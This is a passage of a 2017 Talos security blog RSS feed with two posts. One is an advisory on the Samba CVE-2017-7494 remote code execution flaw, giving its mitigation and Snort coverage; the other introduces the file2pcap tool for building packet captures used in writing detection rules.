&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/ap40FDe81Ss" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-05-26T12:41:57.360-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s72-c/amp-tg-proxy-umbrella.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/05/threat-roundup-0519-0526.html</feedburner:origLink></item><item><title>Samba Vulnerability: Dancing Its Way to a Network Near You</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/f_tPlpkE8BQ/samba-vuln-details.html</link><category>samba</category><category>Talos</category><category>Vulnerability</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Thu, 25 May 2017 00:31:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-7582375314909239852</guid><description>&lt;h3&gt;Overview&lt;/h3&gt;&lt;div&gt;&lt;div&gt;Today, a new vulnerability affecting the widely used Samba software was released. Samba is the SMB/CIFS protocol commonly used in *NIX operating systems. &lt;a href="https://www.samba.org/samba/security/CVE-2017-7494.html"&gt;CVE-2017-7494&lt;/a&gt; has the potential to impact many systems around the world. This vulnerability could allow a user to upload a shared library to a writeable share on a vulnerable Samba server and result in the server executing the uploaded file. &amp;nbsp;This would allow an attacker to upload an exploit payload to a writeable Samba share, resulting in code execution on any server running an affected version of the Samba package. &amp;nbsp;This currently affects all versions of Samba 3.5.0 (released March of 2010) and later. 
To emphasize the severity and low complexity: a Metasploit one-liner can be used to trigger this vulnerability.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A patch has already been released to address the issue. Additionally, there is a mitigation available within the configuration of Samba itself. Adding the parameter "nt pipe support = no" to the global section of the smb.conf file and restarting the service will also mitigate the threat. This threat is only beginning to be recognized by potential attackers, with PoC code having already been released on the Internet. It is only a matter of time before adversaries begin to use it more widely to compromise additional systems, both externally and internally.&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This is likely to affect numerous servers, storage devices such as NAS systems, and anything else running a version of Samba that is vulnerable to this attack. Users are urged to contact their vendor to obtain patched firmware or recommendations for addressing this threat. In the meantime, the above workaround may help. In accordance with best practices, it is highly recommended that users do not allow direct SMB, Samba, CIFS, NFS, etc. 
access from the Internet to systems within their network.&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;Coverage&lt;/h3&gt;&lt;div&gt;&lt;div&gt;Snort Rules: 43002-43004&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Additional ways our customers can detect and block this threat are listed below.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s1600/netsec-only.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1341" data-original-width="1600" height="335" src="https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s400/netsec-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) is ideally suited to prevent the execution of the malware used by these threat actors.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html"&gt;CWS&lt;/a&gt; or &lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt;WSA&lt;/a&gt; web scanning prevents access to malicious websites and detects malware used in these attacks.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Network Security appliances such as &lt;a href="https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"&gt;NGFW&lt;/a&gt;, &lt;a 
href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"&gt;NGIPS&lt;/a&gt;, and &lt;a href="https://meraki.cisco.com/products/appliances"&gt;Meraki MX&lt;/a&gt; can detect malicious activity associated with this threat.&lt;/div&gt;&lt;div&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and build protection into all Cisco Security products.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://umbrella.cisco.com/"&gt;Umbrella&lt;/a&gt; prevents DNS resolution of the domains associated with malicious activity.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html"&gt;Stealthwatch&lt;/a&gt; detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=f_tPlpkE8BQ:UmkdzmxxjDE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/f_tPlpkE8BQ" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-05-25T03:31:37.033-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s72-c/netsec-only.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/05/samba-vuln-details.html</feedburner:origLink></item><item><title>File2pcap - The Talos Swiss Army Knife of Snort Rule Creation</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/VdVLF8ZDTE4/file2pcap.html</link><category>file2pcap</category><category>Snort Rules</category><category>Talos</category><category>tcp/ip</category><category>threat intel tools</category><category>Threat Research</category><author>noreply@blogger.com (William Largent)</author><pubDate>Wed, 24 May 2017 09:02:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-7399830852917196724</guid><description>&lt;i&gt;This post was authored by Martin Zeiser with contributions by &lt;a href="https://twitter.com/JoelEsler" target="_blank"&gt;Joel Esler&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;At Talos we are constantly on the lookout for threats to our customers networks, and part of the protection process is creating Snort rules for the latest vulnerabilities in order to detect any attacks.&lt;br /&gt;&lt;br /&gt;To improve your understanding of the rule development process, consider a theoretical remotely exploitable vulnerability in server software Server2010. 
A proof-of-concept exploit is developed, the server software is set up on a virtual machine, traffic is captured on the network between attacker and victim, and rule development can start, right?&lt;br /&gt;&lt;br /&gt;But what if, months or years later, the rule needs to be re-inspected because circumstances have changed? This requires another vulnerable version of Server2010 to be found, reinstalled and reconfigured with the vulnerable parameters, so that tests can be run again and again and the network traffic inspected. Then, once the server is installed, the particular exploit used no longer works, because the language it was written in has since changed and the code needs to be fixed accordingly. All this takes plenty of time, which is why it doesn’t happen that way. Instead, a vulnerability is identified, an exploit is written, the exploit is run, and the attack is captured using Wireshark. From then on, the traffic in that pcap file can be used to develop a correct rule. The traffic recorded in a pcap file can easily be put back on the wire using a TCP replay utility, or read directly by Snort. This is why rule developers generally work with pcaps of attacks instead of exploits.&lt;br /&gt;&lt;br /&gt;For file-based vulnerabilities, the original process involved starting a local web server and using a browser to download the exploit file, while recording the transfer using Wireshark. File2pcap did away with this requirement by simulating the traffic and creating the proper pcap without any hassle.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Supported protocols:&lt;/h2&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;HTTP:&lt;/h4&gt;File2pcap started out as a tool to create pcaps from input files, showing these files in transfer from a web server to a browser. By simulating the entire data exchange, it is possible to create a pcap file for any input file, usually within seconds. 
The result always shows a full TCP stream from SYN to FIN, with packets in order and checksums correct. These pcap files can then be used in combination with a TCP replay tool (or read by Snort) to create proper rules for all file-based attacks.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;HTTP/2:&lt;/h4&gt;HTTP has evolved over the last several years, with HTTP/2 now in widespread use. It is typically used encrypted, but the protocol also supports plaintext connections, which is why HTTP/2 was added to file2pcap.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;HTTP POST:&lt;/h4&gt;Though HTTP GET is the prevalent request coming from a browser, data is sometimes uploaded using HTTP POST. To cover this angle, support for HTTP POST was added to file2pcap.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;SMTP/POP3/IMAP:&lt;/h4&gt;While browser-based attacks are one of the most common ways machines are compromised, another threat is email and its attachments. To let Snort rule developers create pcaps for these threats just the way file2pcap allowed them for browser-based attacks, new features were added: specifically, support for the SMTP, POP3 and IMAP protocols. When file2pcap is instructed to craft an SMTP pcap from an input file, it simulates an email from a client to a mail server with the input file sent as an attachment to this email. POP3 and IMAP work similarly. Command-line switches allow the encoding of the attachment to be switched from the default MIME to quoted-printable or even UU-encoding.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;FTP:&lt;/h4&gt;Another typical file transfer protocol which file2pcap supports is FTP, where both ‘active’ and ‘passive’ data streams can be created.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;IPv6:&lt;/h4&gt;To prepare file2pcap even better for covering upcoming attacks, one of the latest additions was support for IPv6. 
Now a simple command-line flag can switch the data exchange from the default IPv4 to IPv6, while keeping everything else the same.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Talos GitHub&lt;/h3&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;To wrap it up, file2pcap is a tool which will create a pcap from any input file, simulating this file in transit using various protocols and encodings. The resulting pcap file can then be used to create or test rules for Snort. File2pcap is in widespread use within Talos for rule creation, as it works reliably while saving plenty of development time.&lt;br /&gt;&lt;br /&gt;File2pcap can be downloaded from our &lt;a href="https://github.com/Cisco-Talos/file2pcap/releases/tag/1.25" target="_blank"&gt;GitHub page&lt;/a&gt;.&lt;br /&gt;Feedback and feature requests are welcome on our &lt;a href="https://github.com/Cisco-Talos/file2pcap/issues" target="_blank"&gt;GitHub Issues page&lt;/a&gt;.&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=VdVLF8ZDTE4:nNUgXtpeYg4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/VdVLF8ZDTE4" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-05-24T12:02:19.874-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/05/file2pcap.html</feedburner:origLink></item></channel></rss>
